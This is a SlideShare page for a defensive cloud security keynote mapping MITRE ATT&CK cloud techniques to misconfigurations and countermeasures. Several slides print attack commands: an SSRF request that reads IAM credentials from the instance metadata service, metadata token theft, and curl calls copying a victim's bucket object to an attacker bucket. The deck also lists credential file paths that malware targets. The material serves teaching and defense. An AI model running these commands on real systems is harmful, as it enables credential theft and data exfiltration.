SlideShare a Scribd company logo

Breaking The Cloud Kill Chain

Puma Security, LLC
Puma Security, LLC

Organizations are moving data and applications into public cloud services at a rapid pace. As the public cloud footprint expands, red teams and attackers are reinventing the kill chain in the cloud. Public cloud services provide new, creative ways to discover assets, compromise credentials, move laterally, and exfiltrate data. In this keynote, we explore common techniques from the MITRE ATT&CK Cloud Matrix. For each technique, attendees will analyze misconfigurations, exploitation paths, and common architecture patterns for breaking the kill chain.

Technology
1 of 52
Download to read offline
Breaking The Cloud Kill Chain
Eric Johnson • Principal Security Engineer, Puma Security → Coder: cloud infrastructure automation, CI / CD orchestration, static analysis engine, security tools → Security assessments: Cloud, DevOps, source code, web apps, mobile apps • Senior Instructor, SANS Institute → Contributing author of SEC540, SEC510, SEC549 • Education & Training → Iowa State M.S. Information Assurance, B.S. Computer Engineering → AWS Certified Developer, CISSP, GPCS, GSSP, GWAPT • Contact information → Email: ejohnson@pumasecurity.io → LinkedIn: https://www.linkedin.com/in/eric-m-johnson/ → Twitter: @emjohn20 $ aws sts get-caller-identity 2
ŒCloud MITRE ATT&CK Framework Cloud Infrastructure Discovery ŽUnsecured Credentials Network Service Discovery Transfer Data to Cloud Account Agenda 3
MITRE ATT&CK tactics covering cloud-based attack techniques: Understanding the Cloud Kill Chain 4
The MITRE ATT&CK Cloud Matrix guides our attack methodology for the key cloud services: MITRE ATT&CK Cloud Services 5
T1580: Cloud Infrastructure Discovery
MITRE ATT&CK T1580: Discovering infrastructure and resources misconfigured for public cloud access: Cloud Infrastructure Discovery 7 • Storage buckets • Big data sets / databases • Container image repositories • Secrets and cryptographic keys • Virtual machine image or database snapshots
AWS Exposable Resources, by Scott Piper, contains a list of non-VPC bound AWS resources that can also be exposed publicly: AWS Publicly Exposable Resources 8 • S3 Bucket ACLs and public bucket policy • EBS Volume Snapshots shared publicly • EC2 Amazon Machine Images shared publicly • ECR container image public repositories • RDS Database and Cluster Snapshots • SQS Queue public policy • SNS notification topics public policy • Lambda function URLs provided a dedicated HTTPS endpoint • More at https://github.com/SummitRoute/ aws_exposable_resources
Big Query Datasets support sharing with allUsers and external cloud identity accounts: BigQuery Public Datasets 9
10 Azure Virtual Machines Disk Snapshots • Sharable with other users in the AD tenant • Supports direct downloads using SAS tokens • Provides a non-VNet bound way to exfiltrate snapshots
Defending against resource misconfiguration starts with applying detective and preventative policies in the resource hierarchy: Breaking The Kill Chain: MITRE ATT&CK T1580 11 • Service Control Policy (SCP) • Azure Policy • Organization Policy AWS Azure GCP
Service Control Policy (SCP) documents can attach to the root, OU, and account level nodes in the AWS organization: Breaking The Kill Chain: Cloud Resource Hierarchy 12
13 Breaking The Kill Chain: Service Control Policies { "Statement": [ { "Action": [ "s3:PutAccountPublicAccessBlock" ], "Resource": "*", "Effect": "Deny" } ] } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Example SCPs blocking API calls to modify public S3 and Lambda function URL configurations: { "Statement": [ { "Action": [ "lambda:CreateFunctionUrlConfig", "lambda:UpdateFunctionUrlConfig" ], "Resource": "arn:aws:arn:aws:lambda:*:*:function/*", "Effect": "Deny", "Condition": { "StringNotEquals": { "lambda:FunctionUrlAuthType": "AWS_IAM" … } 1 2 3 4 5 6 7 8 9 10 11 12 13 14
T1552: Unsecured Credentials
MITRE ATT&CK T1522: Discovering insecurely stored IAM and service account credentials: Unsecured Credentials 15 Unsecured Credential Locations Bash History Configuration Files Source Code Version Control Instance Metadata Service Environment Variables
Attackers target credentials that map to many different resource types across the cloud providers: Cloud Credential Types 16 • IAM Users & Roles • Service Principal & Managed Identity • Service Accounts AWS IAM Azure AD Cloud Identity
Cloud-focused malware (e.g., TeamTNT) will focus on common locations with cleartext credentials: • ~/.aws/credentials • ~/.azure/accessTokens.json • ~/.config/gcloud/*credential* • ~/.ssh/* Configuration File Credentials 17
• Node Package Manager • Scanned by Aidan Steele in October 2021 • Identifies 117 valid API keys, including 30 AWS root access keys • https://sec549.com/id259 Version Control and Package Managers 18 • Python Package Index (PyPI) • Scanned by Tom Forbes in January 2023 • Identifies 57 valid AWS API keys, including 11 AWS root access keys • https://sec549.com/id260
19 Environment Variable Credentials env | grep 'AWS' AWS_LAMBDA_FUNCTION_VERSION=$LATEST AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q...4pg9g== AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/serverlessprey-panther AWS_LAMBDA_LOG_STREAM_NAME=2020/01/05/[$LATEST]786a6193a27eb390c0a AWS_DEFAULT_REGION=us-east-1 AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A 1 2 3 4 5 6 7 8 9 • Continuous Integration pipelines, containers, and functions often have secrets stored in environment variables • Local File Inclusion (LFI) and Command Injection vulnerabilities can allow attackers to exfiltrate environment variables
20 Server-Side Request Forgery Credential Extraction curl -s "https://nimbus.labs/api/emrs?resource=http://169.254.169.254/latest/meta- data/iam/security-credentials/nimbus-iam-role { "Code" : "Success", "LastUpdated" : "2020-04-16T18:36:31Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIA54BL6PJR3MV6PUNZ", "SecretAccessKey" : "S0M6vF4UmMlfmV5B/bM2lalWpdTzocbUsSWMMHRI", "Token" : "IQoJb3JpZ2luX2VjEJP...3QtMSJGMEQCIGlgtwykQYitLv8Vg==", "Expiration" : "2020-04-17T00:52:19Z" } 1 2 3 4 5 6 7 8 9 10 11 12 Server-side Request Forgery (SSRF) vulnerabilities can allow attackers to communicate directly with virtual machine instance metadata services:
Defending against unsecured credentials requires defense in depth controls: Breaking The Kill Chain: MITRE ATT&CK T1522 21 • Cloud Threat Detection • OpenID Connect Identity Provider Secrets Scanning Compromised Credential Detection Workload Identity Federation • Version Control Repositories
Breaking The Kill Chain: Version Control Secrets Scanning 22 Perform incremental and continuous secrets scanning:
Cloud-native threat detection capabilities have limited capabilities for finding stolen credentials: Breaking The Kill Chain: Cloud Threat Detection 23 AWS GuardDuty • *:IAMUser/ AnomalousBehavior • UnauthorizedAccess:IAMUser/ InstanceCredentialExfiltration. InsideAWS • UnauthorizedAccess:IAMUser/ InstanceCredentialExfiltration. OutsideAWS
24 Breaking The Kill Chain: Cloud Threat Hunting protoPayload: { @type: "type.googleapis.com/google.cloud.audit.AuditLog" authenticationInfo: { principalEmail: "cheetah-354157@appspot.gserviceaccount.com" principalSubject: "user:sec510-354157@appspot.gserviceaccount.com" } … methodName: "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion" resourceName: "projects/123456789012/secrets/cheetah-database-pass/versions/latest" serviceName: "secretmanager.googleapis.com" requestMetadata: { callerIp: "95.025.143.109" callerSuppliedUserAgent: "curl/7.64.1,gzip(gfe),gzip(gfe)" … } } … timestamp: "2023-01-10T20:30:00.192825193Z" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Threat hunting will have to fill the gaps: Google Cloud Logging WHY IS A CLOUD FUNCTION SERVICE ACCOUNT… ACCESSING SECRETS… FROM AN EXTERNAL IP ADDRESS?
Breaking The Kill Chain: Workload Identity Federation 25 Protip: Long-lived credentials must die!
T1046: Network Service Discovery
MITRE ATT&CK T1046: Enumerating resources with public IP addresses in the victim's cloud account: Network Service Discovery 27 • VPC-bound resource types include: • Virtual machines, load balancers, containers, datastores, Redis clusters, data lakes • Public cloud IP address blocks are well known • Large scale cloud network service discovery (e.g., Shodan, Nmap) • Cloud Scanning For Vulnerability Discovery by @joswr1ght • https://sec510.com/1042 • Identify remotely exploitable hosts and software
EC2 instances created in the AWS Web Console auto-generate a new security group with default open admin access: • Linux VMs auto populate open SSH access • Windows VMs auto populate open RDP access AWS Default Virtual Machine Security Group 28
Azure Virtual Machines created in the UI default to open admin access: • Linux VMs auto-populate open SSH access • Windows VMs auto-populate RDP access Azure Default Virtual Machine Network Access 29
Default VPC contains pre-populated firewall rules allowing wide open administrative access: GCP Default Network Firewall Rules 30
Shodan searching for virtual machines on Google Compute Engine exposing SSH and RDP ports: Misconfigured GCP Firewall Rules 31
Defending against network service discovery requires organizations to build more advanced network architectures: Breaking The Kill Chain: MITRE ATT&CK T1046 32 • Shared VPC & Transit Gateway • Azure Virtual WAN • Shared VPC, Cloud Routing, Peering, VPN AWS Azure Google Cloud
Centralize VPC resources into a single network host account (or project) in the resource hierarchy: Breaking The Kill Chain: VPC Sharing 33 • VPC networks & subnets • Internet & NAT Gateways • Public IP addresses • Route tables • Firewall rules → NACLs → Security Groups • VPC Endpoints
34 Breaking The Kill Chain: Restricting Public Network Connectivity { "Sid": "RestrictPublicConnectivityToInfrastructureAccounts", "Effect": "Deny", "Action": [ "ec2:AllocateAddress", "ec2:AttachInternetGateway", "ec2:CreateInternetGateway", "ec2:CreateEgressOnlyInternetGateway", "ec2:CreateVpcPeeringConnection", "ec2:AcceptVpcPeeringConnection", "globalaccelerator:Create*", "globalaccelerator:Update*" ], "Resource": "*", "Condition": { "StringNotEquals": { "aws:PrincipalAccount": [ "123456789012" ] … } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 Preventing unauthorized public network access: ACTIONS CREATING PUBLIC CONNECTIVITY… DENY…. EXCEPT FOR THE NETWORK HOST ACCOUNT
Breaking The Kill Chain: Centralized Resource Configurations 35 Centralizing network resources into the network host account provides a single pane of glass for public connectivity: PUBLIC INVENTORY
Breaking The Kill Chain: Centralized Inbound, Outbound, Traffic Inspection 36
T1537: Transfer Data to Cloud Account
MITRE ATT&CK T1537: Exfiltrating data from the victim's cloud account by escalating privileges and transferring data on the cloud provider's backbone network to avoid network-based detection Transfer Data to the Attacker's Cloud Account 38 • Compromising over permissioned service accounts • Impersonating a target service account • Transferring data across the cloud provider's backbone network • Pivoting with stolen credentials
39 Privilege Escalation: Azure Overly Scoped Role Definition { "assignableScopes": [ "/subscriptions/${var.subscription_id}" ], "permissions": [ { "actions": [ "Microsoft.Storage/storageAccounts/listKeys/action", "Microsoft.Storage/storageAccounts/ListAccountSas/action", "Microsoft.Storage/storageAccounts/read" ], } ], "roleName": "Storage Access" } 1 2 3 4 5 6 7 8 9 10 11 12 13 Example role definition allowing excessive permissions and overly scoped access to resources: SUBSCRIPTION-WIDE SCOPE TO ALL STORAGE ACCOUNTS
Google Cloud's Primitive Editor role has permission to view, modify, and delete existing project resources (with a few exceptions): • Default role assigned to Compute instances, App Engine services, and Cloud Functions • Too permissive for what your workload needs in production • Has over 4,000 assigned permissions on the project • Attackers compromising workloads with Editor permissions can access data across the project Privilege Escalation: Google Cloud's Primitive Editor Role 40
Transitive privilege escalation occurs by creating a resource that inherits permissions from a supplied service account: • AWS: iam:PassRole permission • GCP: iam.serviceAccounts.actAs permission Privilege Escalation: Transitive Permission Assignment 41 Create a Compute Instance Configure Compute to Run as the target service account Obtain token through the Instance Metadata Server (IMDS) Impersonate Privileged Service Account in Project
Attackers leverage private service access (private link) to exfiltrate data across the cloud provider's backbone network: • Private link services are designed to help customers keep data from traversing the Internet • Default policy (AWS, GCP) allows multi- tenant access to the cloud provider APIs • May allow data to move cross-tenant between resources without network and firewall inspection Data Exfiltration: Transferring Data Cross Tenant 42
43 Data Exfiltration: Stolen Credential Pivoting export BEARER_TOKEN=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/ computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token) # List all storage buckets in the victim's project curl -s -H "Authorization: Bearer $BEARER_TOKEN" "https://storage.googleapis.com/storage/v1/b?project=victims-project" # Copy objects from the victim's bucket curl -s -X POST -H "Authorization: Bearer $BEARER_TOKEN" https://storage.googleapis.com/storage/v1/b/victims-bucket/o/data.pdf/copyTo/b/attackers- bucket/o/data.pdf 1 2 3 4 5 6 7 8 9 10 11 Exfiltrating data from the victim's Google Cloud project using the stolen credential:
Defending against privilege escalation and data exfiltration requires additional cloud-native controls to prevent data from leaving the organization's tenant: Breaking The Kill Chain: MITRE ATT&CK T1537 44 • IAM Access Analyzer • IAM Recommender • Private Link Services • Network Access Rules • VPC Service Controls AWS / GCP AWS / Azure Google Cloud
Breaking The Kill Chain: IAM Recommender 45 Reviewing IAM Recommender reports and reducing excessive permissions:
Breaking The Kill Chain: Service Endpoint Configuration 46 Preventing data exfiltration with private link services and network access policy:
Breaking The Kill Chain: VPC Service Controls 47 Configuring a VPC Service Controls perimeter to prevent data exfiltration: • Perimeter includes the authorized projects • In-scope services include the GCS storage service • Unauthorized projects and external clients cannot interact with the target GCS bucket
Conclusions
Breaking The Cloud Kill Chain requires an in-depth understanding of cloud-native services and configurations: Closing Remarks Resources can be made public too easily, build guardrails with the policy hierarchy Credential management continues to be a problem, move to workload identity federation Cloud resources are Internet exposed too easily, central network inspection is critical New ways to hide & exfiltrate data exist, focus on building network identity perimeters
51
Thank you for attending! Questions? 52

Recommended

Azure Security Center- Zero to Hero
Azure Security Center- Zero to HeroAzure Security Center- Zero to Hero
Azure Security Center- Zero to Hero
Kasun Rajapakse
 
AWS Security Checklist
AWS Security ChecklistAWS Security Checklist
AWS Security Checklist
Amazon Web Services
 
AWS Security Best Practices
AWS Security Best PracticesAWS Security Best Practices
AWS Security Best Practices
Amazon Web Services
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
MITRE ATT&CK
 
Azure Identity and access management
Azure Identity and access managementAzure Identity and access management
Azure Identity and access management
Dinusha Kumarasiri
 
Microsoft Zero Trust
Microsoft Zero TrustMicrosoft Zero Trust
Microsoft Zero Trust
David J Rosenthal
 
Microsoft Azure Security Overview
Microsoft Azure Security OverviewMicrosoft Azure Security Overview
Microsoft Azure Security Overview
Alert Logic
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common Language
Erik Van Buggenhout
 

Recommended

Azure Security Center- Zero to Hero
Azure Security Center- Zero to HeroAzure Security Center- Zero to Hero
Azure Security Center- Zero to Hero
Kasun Rajapakse
 
AWS Security Checklist
AWS Security ChecklistAWS Security Checklist
AWS Security Checklist
Amazon Web Services
 
AWS Security Best Practices
AWS Security Best PracticesAWS Security Best Practices
AWS Security Best Practices
Amazon Web Services
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
MITRE ATT&CK
 
Azure Identity and access management
Azure Identity and access managementAzure Identity and access management
Azure Identity and access management
Dinusha Kumarasiri
 
Microsoft Zero Trust
Microsoft Zero TrustMicrosoft Zero Trust
Microsoft Zero Trust
David J Rosenthal
 
Microsoft Azure Security Overview
Microsoft Azure Security OverviewMicrosoft Azure Security Overview
Microsoft Azure Security Overview
Alert Logic
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common Language
Erik Van Buggenhout
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
Power of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure securityPower of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure security
Bruno Capuano
 
Security Best Practices on AWS
Security Best Practices on AWSSecurity Best Practices on AWS
Security Best Practices on AWS
Amazon Web Services
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
MITRE ATT&CK
 
Fundamentals of AWS Security
Fundamentals of AWS SecurityFundamentals of AWS Security
Fundamentals of AWS Security
Amazon Web Services
 
Cloud Security Architecture.pptx
Cloud Security Architecture.pptxCloud Security Architecture.pptx
Cloud Security Architecture.pptx
Moshe Ferber
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWS
Mike Felch
 
Govern your Azure environment through Azure Policy
Govern your Azure environment through Azure PolicyGovern your Azure environment through Azure Policy
Govern your Azure environment through Azure Policy
Microsoft Tech Community
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
MITRE ATT&CK
 
Azure security architecture
Azure security architectureAzure security architecture
Azure security architecture
Karl Ots
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration Testing
Cheah Eng Soon
 
Automating AWS security and compliance
Automating AWS security and compliance Automating AWS security and compliance
Automating AWS security and compliance
John Varghese
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
Amazon Web Services
 
Professional Services for Cyber Recovery .pptx
Professional Services for Cyber Recovery .pptxProfessional Services for Cyber Recovery .pptx
Professional Services for Cyber Recovery .pptx
ssusercc05cf
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
Introduction to DevOps on AWS
Introduction to DevOps on AWSIntroduction to DevOps on AWS
Introduction to DevOps on AWS
Shiva Narayanaswamy
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK framework
Bhushan Gurav
 
3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD
Andrew Bettany
 
Scalable threat modelling with risk patterns
Scalable threat modelling with risk patternsScalable threat modelling with risk patterns
Scalable threat modelling with risk patterns
Stephen de Vries
 
Azure Governance for Enterprise
Azure Governance for EnterpriseAzure Governance for Enterprise
Azure Governance for Enterprise
Mohit Chhabra
 
Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWS
ManojAccTest
 
Aws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | DallasAws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | Dallas
Nicole Maus
 

More Related Content

What's hot

When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
MITRE ATT&CK
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWS
Mike Felch
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
MITRE ATT&CK
 

What's hot (20)

Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
Power of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure securityPower of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure security
 
Security Best Practices on AWS
Security Best Practices on AWSSecurity Best Practices on AWS
Security Best Practices on AWS
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
 
Fundamentals of AWS Security
Fundamentals of AWS SecurityFundamentals of AWS Security
Fundamentals of AWS Security
 
Cloud Security Architecture.pptx
Cloud Security Architecture.pptxCloud Security Architecture.pptx
Cloud Security Architecture.pptx
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWS
 
Govern your Azure environment through Azure Policy
Govern your Azure environment through Azure PolicyGovern your Azure environment through Azure Policy
Govern your Azure environment through Azure Policy
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
 
Azure security architecture
Azure security architectureAzure security architecture
Azure security architecture
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration Testing
 
Automating AWS security and compliance
Automating AWS security and compliance Automating AWS security and compliance
Automating AWS security and compliance
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
 
Professional Services for Cyber Recovery .pptx
Professional Services for Cyber Recovery .pptxProfessional Services for Cyber Recovery .pptx
Professional Services for Cyber Recovery .pptx
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
 
Introduction to DevOps on AWS
Introduction to DevOps on AWSIntroduction to DevOps on AWS
Introduction to DevOps on AWS
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK framework
 
3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD3 Modern Security - Secure identities to reach zero trust with AAD
3 Modern Security - Secure identities to reach zero trust with AAD
 
Scalable threat modelling with risk patterns
Scalable threat modelling with risk patternsScalable threat modelling with risk patterns
Scalable threat modelling with risk patterns
 
Azure Governance for Enterprise
Azure Governance for EnterpriseAzure Governance for Enterprise
Azure Governance for Enterprise
 

Similar to Breaking The Cloud Kill Chain

Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Amazon Web Services
 
Network Security and Access Control within AWS
Network Security and Access Control within AWS Network Security and Access Control within AWS
Network Security and Access Control within AWS
Amazon Web Services
 
AWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptxAWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptx
Hitendrasingh79
 
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
Amazon Web Services
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 ThreatsHackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats
Amazon Web Services
 

Similar to Breaking The Cloud Kill Chain (20)

Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWS
 
Aws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | DallasAws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | Dallas
 
AWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS SecurityAWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS Security
 
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
 
AWS Architecture Fundamentals - Houston
AWS Architecture Fundamentals - HoustonAWS Architecture Fundamentals - Houston
AWS Architecture Fundamentals - Houston
 
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats
 
MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the Cloud
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud Security
 
Advanced Security Best Practices Masterclass
Advanced Security Best Practices MasterclassAdvanced Security Best Practices Masterclass
Advanced Security Best Practices Masterclass
 
AWS Security Best Practices and Design Patterns
AWS Security Best Practices and Design PatternsAWS Security Best Practices and Design Patterns
AWS Security Best Practices and Design Patterns
 
Network Security and Access Control within AWS
Network Security and Access Control within AWS Network Security and Access Control within AWS
Network Security and Access Control within AWS
 
Understanding AWS Security
Understanding AWS SecurityUnderstanding AWS Security
Understanding AWS Security
 
Building A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for ScaleBuilding A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for Scale
 
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
 
Comenzando com la nube hibrida
Comenzando com la nube hibrida Comenzando com la nube hibrida
Comenzando com la nube hibrida
 
DevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security SuccessDevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security Success
 
AWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptxAWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptx
 
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 ThreatsHackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats
 

More from Puma Security, LLC

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 
Winning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless InfrastructureWinning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless Infrastructure
Puma Security, LLC
 
Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2
Puma Security, LLC
 
Weaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelineWeaponizing Your DevOps Pipeline
Weaponizing Your DevOps Pipeline
Puma Security, LLC
 
Secure DevOps: A Puma's Tail
Secure DevOps: A Puma's TailSecure DevOps: A Puma's Tail
Secure DevOps: A Puma's Tail
Puma Security, LLC
 

More from Puma Security, LLC (11)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
DevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit TestsDevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit Tests
 
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated EnvironmentsLessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
 
Winning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless InfrastructureWinning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless Infrastructure
 
Defending Serverless Infrastructure in the Cloud RSAC 2020
Defending Serverless Infrastructure in the Cloud RSAC 2020Defending Serverless Infrastructure in the Cloud RSAC 2020
Defending Serverless Infrastructure in the Cloud RSAC 2020
 
Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2
 
Cloud Security: Attacking The Metadata Service
Cloud Security: Attacking The Metadata ServiceCloud Security: Attacking The Metadata Service
Cloud Security: Attacking The Metadata Service
 
DevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security SuccessDevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security Success
 
Weaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelineWeaponizing Your DevOps Pipeline
Weaponizing Your DevOps Pipeline
 
Secure DevOps: A Puma's Tail
Secure DevOps: A Puma's TailSecure DevOps: A Puma's Tail
Secure DevOps: A Puma's Tail
 
